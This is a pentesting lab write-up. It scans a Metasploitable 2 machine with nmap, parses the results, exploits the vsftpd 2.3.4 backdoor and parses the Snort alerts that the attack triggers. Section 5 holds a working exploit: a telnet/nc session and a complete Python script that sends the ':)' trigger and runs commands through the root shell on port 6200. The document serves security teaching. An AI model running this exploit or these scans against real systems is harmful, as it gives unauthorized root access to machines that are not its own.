# 🎩 Pentesting and white hacking
<br>
1. Lab installation
- IPS: [Snort](https://www.snort.org/).
- Victim machine: [Metasploitable 2](https://docs.rapid7.com/metasploit/metasploitable-2/).
<br>
2. Attack examples to get the victim's real IP
- Spear | Mass phishing
- SE (Social Engineering)
- Reverse domain lookup
- DNS zone transfer
- IP grabbing
These techniques belong to the first step of a pentest: Footprinting.
<br>
3. Finding available machines
For this part, we will assume that we have found the victim's IP.
Now we want to list the live hosts on its network. This can be done with nmap, giving the network in CIDR notation (`192.168.202.0/24`) and the `-sn` flag (host discovery only, no port scan).
```bash=
$ nmap -sn 192.168.202.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-31 10:28 EDT
Nmap scan report for 192.168.202.2
Host is up (0.00061s latency).
Nmap scan report for 192.168.202.134
Host is up (0.000098s latency).
Nmap scan report for 192.168.202.135
Host is up (0.00045s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.39 seconds
```
As we can see, we found 3 machines:
- 192.168.202.2
- 192.168.202.134
- 192.168.202.135
<br>
4. Banner grabbing & Enumeration
The next step is to get more specific information about the machines, such as the running services and the OS version.
To do so, we can use more advanced flags:
- `-sV`: service version detection.
- `-O`: OS detection (needs raw packet access, hence `sudo`).
- `-sC`: run the default NSE scripts.
- `-T4`: aggressive timing template, for a faster scan.
```bash=
$ sudo nmap -sV -O -sC -T4 192.168.202.135
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-31 11:17 EDT
Nmap scan report for 192.168.202.135
Host is up (0.00052s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.202.134
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
|_ssl-date: 2022-10-31T14:40:16+00:00; -37m32s from scanner time.
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-title: Metasploitable2 - Linux
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 51606/udp mountd
| 100005 1,2,3 58134/tcp mountd
| 100021 1,3,4 46303/tcp nlockmgr
| 100021 1,3,4 49331/udp nlockmgr
| 100024 1 35846/tcp status
|_ 100024 1 36881/udp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 10
| Capabilities flags: 43564
| Some Capabilities: Support41Auth, Speaks41ProtocolNew, LongColumnFlag, SupportsTransactions, SupportsCompression, SwitchToSSLAfterHandshake, ConnectWithDatabase
| Status: Autocommit
|_ Salt: I7s`fb95=qB8.}PT8Y8L
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2022-10-31T14:40:16+00:00; -37m32s from scanner time.
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| uptime: 0 days, 1:09:04
| source ident: nmap
| source host: BC5D6C09.8654285E.FFFA6D49.IP
|_ error: Closing Link: tgzudjgjc[192.168.202.134] (Quit: tgzudjgjc)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:E9:DF:27 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: metasploitable
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: metasploitable.localdomain
|_ System time: 2022-10-31T10:40:08-04:00
|_clock-skew: mean: 22m28s, deviation: 2h00m00s, median: -37m32s
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Nmap done: 1 IP address (1 host up) scanned in 22.25 seconds
```
From this scan, we obtain the following information:
- 192.168.202.2: Router
- 192.168.202.134: the attacking machine (the `ftp-syst` and `irc-info` output above shows it as the connecting host)
- 192.168.202.135: Metasploitable, with the following open ports:
  - 21/tcp open ftp vsftpd 2.3.4
  - 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
  - 23/tcp open telnet Linux telnetd
  - 25/tcp open smtp Postfix smtpd
  - 53/tcp open domain ISC BIND 9.4.2
  - 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
  - 111/tcp open rpcbind 2 (RPC #100000)
  - 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  - 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
  - 512/tcp open exec netkit-rsh rexecd
  - 513/tcp open login OpenBSD or Solaris rlogind
  - 514/tcp open tcpwrapped
  - 1099/tcp open java-rmi GNU Classpath grmiregistry
  - 1524/tcp open bindshell Metasploitable root shell
  - 2049/tcp open nfs 2-4 (RPC #100003)
  - 2121/tcp open ftp ProFTPD 1.3.1
  - 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
  - 8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
  - 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
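Reading a long `-sV -sC` report by hand is how the list above was produced; the following script (an added example, not part of the original notes) does the same triage automatically. It parses the `PORT STATE SERVICE VERSION` table from nmap's normal output and flags the services a pentester looks at first: cleartext protocols, the r-services, the open bind shell and the backdoored vsftpd release. The sample input is a constructed subset of the scan above; the reason strings and the `triage` rules are this example's own choices.

```python
import re
from dataclasses import dataclass

# Constructed sample: a subset of the port table from the nmap scan above.
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
MAC Address: 00:0C:29:E9:DF:27 (VMware)
"""

# "<port>/<proto> <state> <service> [<version ...>]"; NSE lines start with "|".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Services worth a first look, with the reason that goes into the notes.
CLEARTEXT = {
    "ftp": "credentials and data sent in cleartext",
    "telnet": "cleartext remote shell",
    "exec": "rexec: cleartext password, host-based trust",
    "login": "rlogin: trusts ~/.rhosts",
    "shell": "rsh: trusts ~/.rhosts",
}


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str


def parse_ports(text):
    """Return one Service per port line; script output and host details are skipped."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        port, proto, state, name, version = m.groups()
        services.append(Service(int(port), proto, state, name, (version or "").strip()))
    return services


def triage(services):
    """List (port, service, reason) for open services that deserve attention first."""
    findings = []
    for s in services:
        if s.state != "open":
            continue
        if s.name in CLEARTEXT:
            findings.append((s.port, s.name, CLEARTEXT[s.name]))
        if s.name == "bindshell":
            findings.append((s.port, s.name, "unauthenticated shell: " + s.version))
        if s.name == "ftp" and "vsftpd 2.3.4" in s.version:
            findings.append((s.port, s.name, "vsftpd 2.3.4: backdoored release, see section 5"))
        if s.name == "nfs":
            findings.append((s.port, s.name, "NFS exported: check showmount -e"))
    return sorted(findings)


if __name__ == "__main__":
    for port, name, reason in triage(parse_ports(SAMPLE_SCAN)):
        print(f"{port:>5}/tcp  {name:<10} {reason}")
```

To run it on a real scan, save the nmap output to a file and feed its contents to `parse_ports` instead of `SAMPLE_SCAN`; lines such as `514/tcp open tcpwrapped` (no version) are handled, and closed or filtered ports are ignored by `triage`.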
<br>
5. Exploiting the smiley face :)
From the previous scan, we figured out that the last machine runs `vsftpd 2.3.4`. This version is special: the source archive distributed from the project site in 2011 was trojanized and contains a backdoor (CVE-2011-2523), nicknamed "smiley face" after its trigger. When the `USER` string sent to the FTP server contains the two characters `:)`, the backdoor code runs and opens an unauthenticated root shell listening on port 6200/tcp. The password does not matter.
Origin of the name: the backdoored code checks the username for the byte `0x3a` (`:`) immediately followed by `0x29` (`)`).

Exploit:
```bash=
# first terminal: FTP control channel (port 21), username containing ":)"
$ telnet 172.16.24.135 21
Trying 172.16.24.135...
Connected to 172.16.24.135.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER nope:)
331 Please specify the password.
PASS nope_again
# second terminal: the backdoor is now listening on 6200/tcp
$ nc 172.16.24.135 6200
id
uid=0(root) gid=0(root)
```

*The victim IP is not the same as earlier because the exploit was run from another machine.*
Abusing it, we obtain a beautiful root shell on the machine :)
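The same exchange as one script, added here as an example (not code from the original notes): `contains_trigger` mirrors the backdoor's own check for `0x3a 0x29` in the username, `exploit` plays the "first terminal" (USER/PASS on port 21) and then the "second terminal" (a command on port 6200) while the control connection is still open. The target address, the one-second pause before connecting to 6200 and the `nope:)` / `nope_again` credentials are assumptions for a lab run.

```python
import socket
import sys
import time

FTP_PORT = 21
BACKDOOR_PORT = 6200  # listener spawned by the backdoored vsftpd 2.3.4


def contains_trigger(user):
    """Mirror the backdoor's test: a byte 0x3a (':') immediately followed by
    0x29 (')') anywhere in the USER string. Any username works, e.g. 'nope:)'."""
    data = user.encode() if isinstance(user, str) else bytes(user)
    return any(data[i] == 0x3A and data[i + 1] == 0x29 for i in range(len(data) - 1))


def ftp_login_bytes(user, password):
    """The two control-channel lines typed in the first terminal above."""
    return f"USER {user}\r\nPASS {password}\r\n".encode()


def run_command(host, cmd, timeout=3):
    """Talk to the spawned shell the way 'nc host 6200' does; there is no prompt,
    so read until the shell goes quiet."""
    with socket.create_connection((host, BACKDOOR_PORT), timeout=timeout) as s:
        s.sendall(cmd.encode() + b"\n")
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks).decode(errors="replace")


def exploit(host, cmd="id", user="nope:)", password="nope_again", timeout=5):
    """Send the trigger on the FTP control channel, then run cmd through 6200/tcp."""
    if not contains_trigger(user):
        raise ValueError("username does not contain ':)', the backdoor would not fire")
    with socket.create_connection((host, FTP_PORT), timeout=timeout) as ctl:
        banner = ctl.recv(1024).decode(errors="replace").strip()  # 220 (vsFTPd 2.3.4)
        ctl.sendall(f"USER {user}\r\n".encode())
        ctl.recv(1024)  # 331 Please specify the password.
        ctl.sendall(f"PASS {password}\r\n".encode())
        time.sleep(1)  # assumption: give vsftpd a moment to bind 6200/tcp
        output = run_command(host, cmd, timeout)
    return banner, output


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "172.16.24.135"  # lab victim (assumed)
    banner, output = exploit(target)
    print("banner:", banner)
    print(output.strip())  # on Metasploitable 2: uid=0(root) gid=0(root)
```

Run it only against the lab machine (`python3 vsftpd_smiley.py 172.16.24.135`); if 6200/tcp is refused, the server is either patched or not the trojanized build, and `contains_trigger` tells you whether the username you chose would have fired at all.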
<br>
6. Vulnerability scanning
For this step, we will use Nessus as vulnerability scanner.

*The full report is in linked files.*
<br>
7. Detection with Snort
While the Samba service on 445/tcp was being attacked from 192.168.202.134, the Snort IPS from the lab setup logged the following alerts (fast alert format: timestamp, `[generator:SID:revision]`, rule message, classification, priority, protocol and `source -> destination`):
```
11/03-10:34:09.779448 [**] [1:43004:5] SERVER-SAMBA Samba is_known_pipe arbitrary module load code execution attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} 192.168.202.134:49706 -> 192.168.202.135:445
11/03-10:34:10.877778 [**] [1:43004:5] SERVER-SAMBA Samba is_known_pipe arbitrary module load code execution attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} 192.168.202.134:39558 -> 192.168.202.135:445
```
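A small parser for that alert format, added here as an example (not from the original notes or from Snort itself), turns the log into structured records and counts repeated attempts per rule, source and target. The sample input is the two alert lines above; `summarize` keeps only priority 1 by default, which in Snort is the most urgent level.

```python
import re
from collections import Counter

# Constructed sample: the two alert lines from the Snort log above.
SAMPLE_ALERTS = """\
11/03-10:34:09.779448 [**] [1:43004:5] SERVER-SAMBA Samba is_known_pipe arbitrary module load code execution attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} 192.168.202.134:49706 -> 192.168.202.135:445
11/03-10:34:10.877778 [**] [1:43004:5] SERVER-SAMBA Samba is_known_pipe arbitrary module load code execution attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} 192.168.202.134:39558 -> 192.168.202.135:445
"""

# Snort "fast" format:
# <ts> [**] [gid:sid:rev] <msg> [**] [Classification: <cls>] [Priority: <n>] {<proto>} <src>:<port> -> <dst>:<port>
# Classification and ports are optional (rules without classtype, ICMP alerts).
ALERT_RE = re.compile(
    r"^(?P<ts>\S+) \[\*\*\] \[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\] (?P<msg>.*?) \[\*\*\] "
    r"(?:\[Classification: (?P<cls>[^\]]*)\] )?\[Priority: (?P<prio>\d+)\] "
    r"\{(?P<proto>\w+)\} (?P<src>[^\s:]+)(?::(?P<sport>\d+))? -> (?P<dst>[^\s:]+)(?::(?P<dport>\d+))?$"
)


def parse_alerts(text):
    """Parse fast-format alert lines into dicts; lines that do not match are skipped."""
    alerts = []
    for line in text.splitlines():
        m = ALERT_RE.match(line.strip())
        if not m:
            continue
        a = m.groupdict()
        for key in ("gid", "sid", "rev", "prio"):
            a[key] = int(a[key])
        for key in ("sport", "dport"):
            a[key] = int(a[key]) if a[key] else None
        alerts.append(a)
    return alerts


def summarize(alerts, max_priority=1):
    """Count alerts per (sid, src, dst, dport), keeping priorities <= max_priority.
    Two hits on the same rule from one host against one port, a second apart,
    read as a repeated exploit attempt rather than a one-off false positive."""
    counts = Counter()
    for a in alerts:
        if a["prio"] <= max_priority:
            counts[(a["sid"], a["src"], a["dst"], a["dport"])] += 1
    return counts


if __name__ == "__main__":
    for (sid, src, dst, dport), n in summarize(parse_alerts(SAMPLE_ALERTS)).items():
        print(f"SID {sid}: {src} -> {dst}:{dport}  x{n}")
```

Point `parse_alerts` at the contents of Snort's `alert` file (the fast-format output) to use it on a real run; records carry the rule message and classification so the summary can be extended to group by `msg` or `cls` instead of SID.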

<br>
8. Pentesting steps
- Footprinting (passive enumeration)
- Scanning (active or passive enumeration)
- Gaining access
- Maintaining access
- Covering tracks